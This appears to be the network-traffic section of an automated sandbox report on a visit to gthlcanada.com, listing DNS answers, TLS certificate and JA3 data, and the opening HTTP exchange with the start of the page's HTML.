                                                                                                                          Jan 13, 2025 22:01:13.201623917 CET1.1.1.1192.168.11.200xc2f9No error (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.201706886 CET1.1.1.1192.168.11.200x9e82No error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.201706886 CET1.1.1.1192.168.11.200x9e82No error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.201919079 CET1.1.1.1192.168.11.200x9ac6No error (0)content.jwplatform.com3.171.100.83A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.201919079 CET1.1.1.1192.168.11.200x9ac6No error (0)content.jwplatform.com3.171.100.126A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.201919079 CET1.1.1.1192.168.11.200x9ac6No error (0)content.jwplatform.com3.171.100.128A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.201919079 CET1.1.1.1192.168.11.200x9ac6No error (0)content.jwplatform.com3.171.100.86A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.293391943 CET1.1.1.1192.168.11.200x89No error (0)d2pr6pnwfmh0za.cloudfront.net54.239.153.138A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.293391943 CET1.1.1.1192.168.11.200x89No error (0)d2pr6pnwfmh0za.cloudfront.net54.239.153.60A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.293391943 CET1.1.1.1192.168.11.200x89No error (0)d2pr6pnwfmh0za.cloudfront.net54.239.153.76A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.293391943 CET1.1.1.1192.168.11.200x89No error (0)d2pr6pnwfmh0za.cloudfront.net54.239.153.171A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.949805975 CET1.1.1.1192.168.11.200x1a66No error (0)www.google.com65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.949834108 CET1.1.1.1192.168.11.200xfe96No error (0)www.google.com64.233.180.104A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.949834108 CET1.1.1.1192.168.11.200xfe96No error (0)www.google.com64.233.180.147A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.949834108 CET1.1.1.1192.168.11.200xfe96No error (0)www.google.com64.233.180.103A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.949834108 CET1.1.1.1192.168.11.200xfe96No error (0)www.google.com64.233.180.105A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.949834108 CET1.1.1.1192.168.11.200xfe96No error (0)www.google.com64.233.180.99A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.949834108 CET1.1.1.1192.168.11.200xfe96No error (0)www.google.com64.233.180.106A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:14.069636106 CET1.1.1.1192.168.11.200x827bNo error (0)d2pr6pnwfmh0za.cloudfront.net54.239.153.76A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:14.069636106 CET1.1.1.1192.168.11.200x827bNo error (0)d2pr6pnwfmh0za.cloudfront.net54.239.153.171A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:14.069636106 CET1.1.1.1192.168.11.200x827bNo error (0)d2pr6pnwfmh0za.cloudfront.net54.239.153.138A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:14.069636106 CET1.1.1.1192.168.11.200x827bNo error (0)d2pr6pnwfmh0za.cloudfront.net54.239.153.60A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:14.281043053 CET1.1.1.1192.168.11.200x922eNo error (0)content.jwplatform.com3.171.100.86A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:14.281043053 CET1.1.1.1192.168.11.200x922eNo error (0)content.jwplatform.com3.171.100.83A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:14.281043053 CET1.1.1.1192.168.11.200x922eNo error (0)content.jwplatform.com3.171.100.126A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:14.281043053 CET1.1.1.1192.168.11.200x922eNo error (0)content.jwplatform.com3.171.100.128A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:14.739159107 CET1.1.1.1192.168.11.200xeba6No error (0)gthlcanada.com137.117.65.222A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:14.828082085 CET1.1.1.1192.168.11.200x1d7dNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:14.828082085 CET1.1.1.1192.168.11.200x1d7dNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:14.829554081 CET1.1.1.1192.168.11.200x86ccNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:15.928565025 CET1.1.1.1192.168.11.200x6042No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:15.928565025 CET1.1.1.1192.168.11.200x6042No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:15.928608894 CET1.1.1.1192.168.11.200xa0a1No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:16.502952099 CET1.1.1.1192.168.11.200xeaefNo error (0)static.ctctcdn.comstatic.ctctcdn.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:16.502999067 CET1.1.1.1192.168.11.200x42dNo error (0)rum-static.pingdom.net172.67.5.216A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:16.502999067 CET1.1.1.1192.168.11.200x42dNo error (0)rum-static.pingdom.net104.22.55.104A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:16.502999067 CET1.1.1.1192.168.11.200x42dNo error (0)rum-static.pingdom.net104.22.54.104A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:16.503314018 CET1.1.1.1192.168.11.200x57acNo error (0)rum-static.pingdom.net65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:16.503954887 CET1.1.1.1192.168.11.200x9b18No error (0)static.ctctcdn.comstatic.ctctcdn.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:16.712846041 CET1.1.1.1192.168.11.200x9b46No error (0)www.googletagservices.com172.253.62.157A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:16.712846041 CET1.1.1.1192.168.11.200x9b46No error (0)www.googletagservices.com172.253.62.154A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:17.164081097 CET1.1.1.1192.168.11.200x6251No error (0)loopconstruct.com176.53.147.97A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:17.480876923 CET1.1.1.1192.168.11.200xa160No error (0)rum-static.pingdom.net104.22.55.104A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:17.480876923 CET1.1.1.1192.168.11.200xa160No error (0)rum-static.pingdom.net172.67.5.216A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:17.480876923 CET1.1.1.1192.168.11.200xa160No error (0)rum-static.pingdom.net104.22.54.104A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:17.481786013 CET1.1.1.1192.168.11.200x603eNo error (0)rum-static.pingdom.net65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:17.532990932 CET1.1.1.1192.168.11.200xf596No error (0)static.ctctcdn.comstatic.ctctcdn.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:17.534142971 CET1.1.1.1192.168.11.200x5910No error (0)static.ctctcdn.comstatic.ctctcdn.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:17.538464069 CET1.1.1.1192.168.11.200x3e3dNo error (0)listgrowth.ctctcdn.com3.171.61.116A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:17.538464069 CET1.1.1.1192.168.11.200x3e3dNo error (0)listgrowth.ctctcdn.com3.171.61.33A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:17.538464069 CET1.1.1.1192.168.11.200x3e3dNo error (0)listgrowth.ctctcdn.com3.171.61.58A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:17.538464069 CET1.1.1.1192.168.11.200x3e3dNo error (0)listgrowth.ctctcdn.com3.171.61.90A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:17.805747986 CET1.1.1.1192.168.11.200x5352No error (0)www.googletagservices.com172.253.115.156A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:17.805747986 CET1.1.1.1192.168.11.200x5352No error (0)www.googletagservices.com172.253.115.155A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:17.817862034 CET1.1.1.1192.168.11.200x4e23No error (0)securepubads.g.doubleclick.net172.253.63.154A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:17.817862034 CET1.1.1.1192.168.11.200x4e23No error (0)securepubads.g.doubleclick.net172.253.63.155A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:17.819236994 CET1.1.1.1192.168.11.200xa139No error (0)securepubads.g.doubleclick.net65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:18.604446888 CET1.1.1.1192.168.11.200xc2b6No error (0)www.google.com142.251.111.105A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:18.604446888 CET1.1.1.1192.168.11.200xc2b6No error (0)www.google.com142.251.111.99A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:18.604446888 CET1.1.1.1192.168.11.200xc2b6No error (0)www.google.com142.251.111.103A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:18.604446888 CET1.1.1.1192.168.11.200xc2b6No error (0)www.google.com142.251.111.147A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:18.604446888 CET1.1.1.1192.168.11.200xc2b6No error (0)www.google.com142.251.111.104A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:18.604446888 CET1.1.1.1192.168.11.200xc2b6No error (0)www.google.com142.251.111.106A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:18.604509115 CET1.1.1.1192.168.11.200x4615No error (0)www.google.com65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:18.621345997 CET1.1.1.1192.168.11.200x6fdaNo error (0)listgrowth.ctctcdn.com3.171.61.58A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:18.621345997 CET1.1.1.1192.168.11.200x6fdaNo error (0)listgrowth.ctctcdn.com3.171.61.90A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:18.621345997 CET1.1.1.1192.168.11.200x6fdaNo error (0)listgrowth.ctctcdn.com3.171.61.33A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:18.621345997 CET1.1.1.1192.168.11.200x6fdaNo error (0)listgrowth.ctctcdn.com3.171.61.116A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:19.014375925 CET1.1.1.1192.168.11.200x4493No error (0)virtual.urban-orthodontics.com185.76.79.50A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:19.139736891 CET1.1.1.1192.168.11.200x2355No error (0)securepubads.g.doubleclick.net142.250.31.156A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:19.139736891 CET1.1.1.1192.168.11.200x2355No error (0)securepubads.g.doubleclick.net142.250.31.155A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:19.139946938 CET1.1.1.1192.168.11.200x37c9No error (0)securepubads.g.doubleclick.net65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:19.210741043 CET1.1.1.1192.168.11.200x6054No error (0)loopconstruct.com176.53.147.97A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:22.776683092 CET1.1.1.1192.168.11.200x49bdNo error (0)securepubads.g.doubleclick.net64.233.180.156A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:22.776683092 CET1.1.1.1192.168.11.200x49bdNo error (0)securepubads.g.doubleclick.net64.233.180.154A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:22.776683092 CET1.1.1.1192.168.11.200x49bdNo error (0)securepubads.g.doubleclick.net64.233.180.157A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:22.776683092 CET1.1.1.1192.168.11.200x49bdNo error (0)securepubads.g.doubleclick.net64.233.180.155A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:22.776726961 CET1.1.1.1192.168.11.200x6f2bNo error (0)securepubads.g.doubleclick.net65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:22.778932095 CET1.1.1.1192.168.11.200xc9feNo error (0)gthl.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:22.778932095 CET1.1.1.1192.168.11.200xc9feNo error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:22.778932095 CET1.1.1.1192.168.11.200xc9feNo error (0)s3-w.us-east-1.amazonaws.com52.217.171.9A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:22.778932095 CET1.1.1.1192.168.11.200xc9feNo error (0)s3-w.us-east-1.amazonaws.com52.217.37.4A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:22.778932095 CET1.1.1.1192.168.11.200xc9feNo error (0)s3-w.us-east-1.amazonaws.com16.15.178.155A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:22.778932095 CET1.1.1.1192.168.11.200xc9feNo error (0)s3-w.us-east-1.amazonaws.com16.182.98.169A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:22.778932095 CET1.1.1.1192.168.11.200xc9feNo error (0)s3-w.us-east-1.amazonaws.com52.217.11.116A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:22.778932095 CET1.1.1.1192.168.11.200xc9feNo error (0)s3-w.us-east-1.amazonaws.com54.231.236.249A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:22.778932095 CET1.1.1.1192.168.11.200xc9feNo error (0)s3-w.us-east-1.amazonaws.com3.5.30.21A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:22.778932095 CET1.1.1.1192.168.11.200xc9feNo error (0)s3-w.us-east-1.amazonaws.com3.5.28.249A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:22.780237913 CET1.1.1.1192.168.11.200x64d2No error (0)ep1.adtrafficquality.google172.253.63.155A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:22.780237913 CET1.1.1.1192.168.11.200x64d2No error (0)ep1.adtrafficquality.google172.253.63.154A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:22.780796051 CET1.1.1.1192.168.11.200x8cffNo error (0)ep1.adtrafficquality.google65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:22.786297083 CET1.1.1.1192.168.11.200x2665No error (0)gthl.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:22.786297083 CET1.1.1.1192.168.11.200x2665No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:22.829385996 CET1.1.1.1192.168.11.200x659eNo error (0)pagead-googlehosted.l.google.com64.233.180.132A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:22.836383104 CET1.1.1.1192.168.11.200x8f86No error (0)rum-collector-2.pingdom.netprod-dem-collector-elb-611025824.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:22.836383104 CET1.1.1.1192.168.11.200x8f86No error (0)prod-dem-collector-elb-611025824.eu-west-1.elb.amazonaws.com18.202.38.59A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:22.836383104 CET1.1.1.1192.168.11.200x8f86No error (0)prod-dem-collector-elb-611025824.eu-west-1.elb.amazonaws.com63.34.182.143A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:22.836383104 CET1.1.1.1192.168.11.200x8f86No error (0)prod-dem-collector-elb-611025824.eu-west-1.elb.amazonaws.com63.34.194.62A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:22.852334023 CET1.1.1.1192.168.11.200xa4a9No error (0)rum-collector-2.pingdom.netprod-dem-collector-elb-611025824.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:23.554586887 CET1.1.1.1192.168.11.200xb703No error (0)gthl.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:23.554586887 CET1.1.1.1192.168.11.200xb703No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:23.554586887 CET1.1.1.1192.168.11.200xb703No error (0)s3-w.us-east-1.amazonaws.com52.217.65.212A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:23.554586887 CET1.1.1.1192.168.11.200xb703No error (0)s3-w.us-east-1.amazonaws.com16.15.177.207A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:23.554586887 CET1.1.1.1192.168.11.200xb703No error (0)s3-w.us-east-1.amazonaws.com3.5.29.53A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:23.554586887 CET1.1.1.1192.168.11.200xb703No error (0)s3-w.us-east-1.amazonaws.com16.182.107.209A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:23.554586887 CET1.1.1.1192.168.11.200xb703No error (0)s3-w.us-east-1.amazonaws.com52.217.167.217A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:23.554586887 CET1.1.1.1192.168.11.200xb703No error (0)s3-w.us-east-1.amazonaws.com52.216.219.209A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:23.554586887 CET1.1.1.1192.168.11.200xb703No error (0)s3-w.us-east-1.amazonaws.com52.217.141.185A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:23.554586887 CET1.1.1.1192.168.11.200xb703No error (0)s3-w.us-east-1.amazonaws.com3.5.9.13A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:23.556735039 CET1.1.1.1192.168.11.200x2e72No error (0)gthl.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:23.556735039 CET1.1.1.1192.168.11.200x2e72No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:23.637701988 CET1.1.1.1192.168.11.200xf8afNo error (0)ep1.adtrafficquality.google142.251.163.155A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:23.637701988 CET1.1.1.1192.168.11.200xf8afNo error (0)ep1.adtrafficquality.google142.251.163.154A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:23.638504028 CET1.1.1.1192.168.11.200xf5bdNo error (0)ep1.adtrafficquality.google65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:23.639514923 CET1.1.1.1192.168.11.200x897cNo error (0)ep2.adtrafficquality.google142.251.179.132A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:24.086122990 CET1.1.1.1192.168.11.200x7a40No error (0)rum-collector-2.pingdom.netprod-dem-collector-elb-611025824.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:24.086122990 CET1.1.1.1192.168.11.200x7a40No error (0)prod-dem-collector-elb-611025824.eu-west-1.elb.amazonaws.com63.34.182.143A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:24.086122990 CET1.1.1.1192.168.11.200x7a40No error (0)prod-dem-collector-elb-611025824.eu-west-1.elb.amazonaws.com18.202.38.59A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:24.086122990 CET1.1.1.1192.168.11.200x7a40No error (0)prod-dem-collector-elb-611025824.eu-west-1.elb.amazonaws.com63.34.194.62A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:24.087666988 CET1.1.1.1192.168.11.200x7742No error (0)rum-collector-2.pingdom.netprod-dem-collector-elb-611025824.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:24.512948990 CET1.1.1.1192.168.11.200xa76fNo error (0)ep2.adtrafficquality.google172.253.122.132A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:24.513025999 CET1.1.1.1192.168.11.200x8a46No error (0)ep2.adtrafficquality.google142.251.163.132A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:26.923629045 CET1.1.1.1192.168.11.200x13bcNo error (0)www.googletagservices.com172.253.62.154A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:26.923629045 CET1.1.1.1192.168.11.200x13bcNo error (0)www.googletagservices.com172.253.62.157A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:28.588366032 CET1.1.1.1192.168.11.200x5719No error (0)publickeyservice.msmt.gcp.privacysandboxservices.compublickeyservice-a.msmt-3.gcp.privacysandboxservices.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:28.589721918 CET1.1.1.1192.168.11.200xf223No error (0)publickeyservice.msmt.gcp.privacysandboxservices.compublickeyservice-a.msmt-3.gcp.privacysandboxservices.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:28.589721918 CET1.1.1.1192.168.11.200xf223No error (0)publickeyservice-a.msmt-3.gcp.privacysandboxservices.com34.160.138.104A (IP address)IN (0x0001)false
                                                                                                                          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                          Jan 13, 2025 22:01:18.380875111 CET176.53.147.97443192.168.11.2049876CN=loopconstruct.com CN=E5, O=Let's Encrypt, C=USCN=E5, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USFri Dec 27 12:28:21 CET 2024 Wed Mar 13 01:00:00 CET 2024Thu Mar 27 12:28:20 CET 2025 Sat Mar 13 00:59:59 CET 2027771,4865-4866-4867-49195-49199-49196-49200-52393-52392-49171-49172-156-157-47-53,5-65037-13-27-51-23-45-16-0-43-65281-10-11-17513-18-35,25497-29-23-24,0b2fbd02a9ee42460c14b6886e3cdc20f
                                                                                                                          CN=E5, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USWed Mar 13 01:00:00 CET 2024Sat Mar 13 00:59:59 CET 2027
                                                                                                                          Jan 13, 2025 22:01:20.450012922 CET176.53.147.97443192.168.11.2049923CN=loopconstruct.com CN=E5, O=Let's Encrypt, C=USCN=E5, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USFri Dec 27 12:28:21 CET 2024 Wed Mar 13 01:00:00 CET 2024Thu Mar 27 12:28:20 CET 2025 Sat Mar 13 00:59:59 CET 2027771,4865-4866-4867-49195-49199-49196-49200-52393-52392-49171-49172-156-157-47-53,45-18-10-11-13-23-51-35-17513-5-43-27-65037-16-65281-0,25497-29-23-24,0ed1266be558405f8ffd060433fccb864
                                                                                                                          CN=E5, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USWed Mar 13 01:00:00 CET 2024Sat Mar 13 00:59:59 CET 2027
                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.11.2049789137.117.65.2224431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:12 UTC664OUTGET / HTTP/1.1
                                                                                                                          Host: gthlcanada.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-User: ?1
                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:13 UTC627INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:12 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 106909
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Set-Cookie: _icl_current_language=en; expires=Tue, 14-Jan-2025 21:00:05 GMT; Max-Age=86400; path=/
                                                                                                                          Set-Cookie: _icl_current_language=en; expires=Tue, 14-Jan-2025 21:00:05 GMT; Max-Age=86400; path=/
                                                                                                                          Link: <https://gthlcanada.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                          X-Varnish: 961417799 960893463
                                                                                                                          Age: 63
                                                                                                                          Via: 1.1 varnish-v4
                                                                                                                          X-Cache: HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2025-01-13 21:01:13 UTC15757INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 45 4e 48 22 3e 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 74 68
                                                                                                                          Data Ascii: <!doctype html><html class="no-js" lang="ENH"> <head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="shortcut icon" href="https://gth
